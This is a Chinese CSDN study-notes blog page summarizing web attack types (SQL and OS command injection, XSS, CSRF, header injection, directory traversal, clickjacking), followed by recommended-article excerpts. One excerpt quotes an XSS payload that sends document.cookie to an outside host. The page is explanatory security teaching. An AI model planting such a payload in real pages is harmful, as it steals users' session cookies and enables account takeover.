Web的攻击技术 学习笔记

最新推荐文章于 2021-11-03 16:28:28 发布
最新推荐文章于 2021-11-03 16:28:28 发布
阅读量175 收藏
点赞数
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45192089/article/details/120448673
版权

【图解HTTP学习】
1、针对Web应用的攻击模式:

  • 主动攻击
  • 被动攻击

(1)以服务器为目标的主动攻击

主要攻击服务器上的资源;

主动攻击是指攻击者通过直接访问web应用,把攻击代码传入的攻击模式。由于该模式是直接针对服务器上的资源进行攻击,因此攻击者需要能够访问到那些资源。

主动攻击里面具有代表性的攻击是SQL注入攻击和OS命令注入攻击

(2)以服务器为目标的被动攻击

主要攻击用户的资源和权限;利用用户身份的攻击(对企业内网发起攻击);

被动攻击是指利用圈套策略进行攻击代码的攻击模式。在被动攻击过程中,攻击者不直接对目标web应用访问发起攻击。

被动攻击模式中具有代表性的攻击是跨站脚本攻击(XSS)和跨站点请求伪造(CSRF)。

2、web应用的安全对策可大致分为以下两部分

  • 客户端的验证
  • web应用端(服务器端)的验证

(1)HTTP首部注入攻击:向首部主体内添加内容的攻击成为称为HTTP响应截断攻击(被动攻击);

(2)邮件首部注入攻击:攻击者通过向邮件首部To或Subject内任意添加非法内容发起的攻击;

(3)目录遍历攻击

(4)远程文件包含漏洞

(5)Dos攻击(海量请求,让服务器停止)

(6)密码破解

(7)点击劫持(利用透明的按钮或链接做成陷阱,覆盖在web页面之上,这种行为又称为界面伪装)

sunshine~~~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web应用程序中XSS攻击的检测:一种机器学习方法-研究论文
05-20
随着互联网使用的增加,Web应用程序和网站变得越来越普遍。 随着使用的增加,对Web应用程序和网站的网络攻击也在增加。 在Web应用程序和网站上的所有不同类型的网络攻击中,XSS(跨站点脚本)攻击是最常见的攻击形式之一。 XSS攻击Web安全中的一个主要问题,在OWASP(开放Web应用程序安全性项目)的前10名中排名第二。Web应用程序安全风险抵御XSS攻击的传统方法包括基于硬件和软件的Web应用程序防火墙,其中大多数它们是基于规则和签名的。 通过模糊攻击负载,可以绕过基于规则和基于签名的Web应用程序防火墙。 因此,基于规则和基于签名的Web应用程序防火墙无法有效地检测针对绕过Web应用程序防火墙的有效负载的XSS攻击。 本文旨在使用机器学习来使用各种ML(机器学习)算法来检测XSS攻击,并比较算法在检测Web应用程序和网站中的XSS攻击方面的性能。
你所了解到的Web攻击技术
weixin_34117211的博客
03-24 380
(1)XSS(Cross-Site Scripting,跨站脚本攻击):指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的HTML标签或者JavaScript进行的一种攻击。(2)SQL注入攻击(3)CSRF(Cross-Site Request Forgeries,跨站点请求伪造):指攻击者通过设置好的陷阱,强制对已完成的认证用户进行非预期的个人信息或设定信息等某些状态更新。 转载于:h...
常见的Web攻击学习笔记
不一样的自己的博客
08-14 188
一、跨站脚本攻击(XSS) 跨站脚本攻击(XSS,Cross-site ing)是最常见和基本的攻击WEB网站的方法。攻击者在网页上发布包含攻击性代码的数据。当浏览者看到此网页时,特定的脚本就会以浏览者用户的身份和权限来执行。通过XSS可以比较容易地修改用户数据、窃取用户信息,以及造成其它类型的攻击。 1、对于敏感的cookie信息,使用HttpOnly,使document对象中找不到cookie。 2、对于用户输入的信息要进行转义。 二、跨站请求伪造攻击(CSRF) 跨站请求伪造(CSRF,Cross-
常见的web攻击技术
weixin_40557976的博客
12-17 305
主要分为两大类: 主动攻击攻击者通过访问web应用把攻击代码传入的攻击模式,因此攻击的条件是攻击者要访问到资源才可以攻击 主要有:SQL注入 OS命令注入 被动攻击:利用圈套策略执行攻击代码 安全对策: 客户端的验证 服务器端的验证 ...
网络攻防WEB入门指南
qq_43678263的博客
03-31 1万+
网络攻防WEB入门指南(大佬绕路) 文章目录前言学习网络攻防该如何入门 前言 我对网络攻防的理解,分为比赛和实战两个部分,两者所学习的知识虽有共通之处,但还是有很大区别,我也在向实战的状态转换,不过二者入门所要掌握的知识差别不大。下面主要从网络攻防竞赛角度,也就是知名的CTF夺旗赛,来谈谈网络攻防知识如何入门。 学习网络攻防该如何入门 常规CTF比赛主要分为线上做题,以及线下AWD攻防(Attack With Defence),其中初赛往往为做题形式,决赛为AWD混战。做题形式又分为MISC(杂项)、
Web安全学习笔记PDF
最新发布
01-31
Web 安全学习笔记 PDF 本资源摘要信息将对 Web 安全学习笔记 PDF 进行详细的知识点总结。该笔记涵盖了 Web 安全领域的多个方面,包括网络技术演化、网络攻防技术演化、网络安全观、法律与法规、计算机网络与协议、...
CTF Web学习笔记
01-11
### CTF Web学习笔记知识点详解 #### 杂项部分 **1. 隐写术** 隐写术是一种将信息隐藏于其他非秘密数据之中的技术,这种技术通常用于隐蔽通信或数据保护。在CTF竞赛中,经常出现的情况是将flag隐藏在图像、音频...
Web安全学习笔记.pdf
10-22
Web安全学习笔记》是一份全面介绍Web安全的资料,涵盖了从基础知识到深入技术的多个层面。本笔记首先概述了Web技术的演进历程及其安全挑战的发展,强调了网络安全的重要性。接下来,它深入探讨了计算机网络的基础...
Webgoat学习笔记.zip
03-12
WebGoat学习笔记WebGoat是一款由OWASP(开放网络应用安全项目)开发的在线教学平台,专门用于教授和实践网络安全中的Web应用程序漏洞。它是一个故意设计有漏洞的Web应用,帮助学习者了解并熟悉各种攻击手段,...
web测试学习笔记
07-31
本篇学习笔记将深入探讨Web测试的关键概念、工具和技术。 首先,让我们从Web服务器说起。Apache HTTP Server是一款广泛使用的开源Web服务器,它支持多种操作系统,包括Windows和Linux。Apache的灵活性和可扩展性...
前端之常见的web攻击技术
陈浩然哦 的博客
04-10 2282
1)xss跨站攻击技术:主要是攻击者往网页里嵌入恶意脚本,或者通过改变html元素属性来实现攻击,主要原因在于开发者对用户的变量直接使用导致进入html中会被直接编译成js,通常的get请求通过url来传参,可以在url中传入恶意脚本,从而获取信息,解决方法:特殊字符过滤。 2)sql注入攻击:主要是就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶...
浅谈常用的几种web攻击方式以及解决办法
zou2ouzou的博客
03-08 6686
身在互联网的时候,web在给我们带来便利的同时,有些人也在盯着这些便利,因此出现了攻击网站的现象。所以我们在开发的时候,要注意这些容易被攻击的地方,以及做好防御的措施,下面将介绍一些这些常见的攻击手段以及解决办法。        1.SQL注入             攻击方式            大多数人拥有字母数字式密码,或者有安全意识的人,拥有附带其他键盘符号的字母数字式密码。由于
常见的Web攻击手段-整理
loongshawn的博客
02-28 1万+
整理常见的Web攻击手段: XSS攻击 CSRF攻击 SQL注入攻击 文件上传漏洞 DDoS攻击 其他攻击手段
html5面试常见问题及答案:Web安全篇
liuyingv8的博客
03-23 2660
1、你所了解到的Web攻击技术(1)XSS攻击(2)CSRF攻击(3)网络劫持攻击(4)控制台注入代码(5)钓鱼2、如何防止XSS攻击?(1)将前端输出数据都进行转义(2)将输出的字符串中的反斜杠进行转义(3)从url中获取的信息,防止方法是由后端获取,在前端转义后再行输出(4)使用cookie的HttpOnly属性,保护好cookie3、项目中有没有用过加密,哪种加密算法?项目中没有用过,但我了...
Web攻击技术
Baron的博客
11-03 748
来自互联网的攻击大多冲着Web站点来的,大多把Web应用作为攻击目标。 1.针对Web攻击技术 (1)HTTP不具备必要的安全功能 (2)在客户端即可篡改请求 (3)针对Web应用的攻击模式 两种模式:主动攻击、被动攻击 主动攻击攻击者直接访问Web应用,把攻击代码传入的攻击模式。(最具代表性的攻击是SQL注入攻击和OS命令注入攻击) 被动攻击:利用圈套策略执行攻击代码的攻击模式。不直接对Web应用访问发起攻击。 利用用户的身份攻击企业内部网络 2.因输出值转义不完全引发的安全漏洞 实施Web
常见的web攻击手段
diansheshi4163的博客
07-05 346
XSS:跨站脚本攻击 -典型实例为: 当用户在表达输入一段数据后,提交给服务端进行持久化。如果此用户输入的是一段脚本语言,而服务端 用户输入的数据没有经过转码、校验等就存入了数据库,在其他页面需要展示此数据时,就会执行此用户输入的语言。简单来说,JS的强大不用我来解释吧 -推荐防御措施: 对用户输入的信息进行转义,例如<>'等等特殊字符。当然,其实很多前端框架...
网站常用攻击技术详解
热门推荐
码上代码的博客
05-26 2万+
一、跨站脚本攻击 二、跨站请求伪造 三、SQL 注入攻击 四、拒绝服务攻击 参考资料 一、跨站脚本攻击 概念 跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript。 攻击原理 例如有一个论坛网站,攻击者可以在上面发布以下内容: <script>location.href="//domain.com/?c=" + document.cookie</script> 之后该内容可能会..
Servlet&JSP学习笔记:林学良详解Web开发核心技术
学习笔记.pdf 林学良" 本书《Servlet&JSP 学习笔记》由林信良编著,特别针对Servlet 3.0的新特性进行了全面的更新和改版。全书深入浅出地阐述了Servlet和JSP与Web容器(如Tomcat)之间的交互机制,并通过分析Tomcat...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值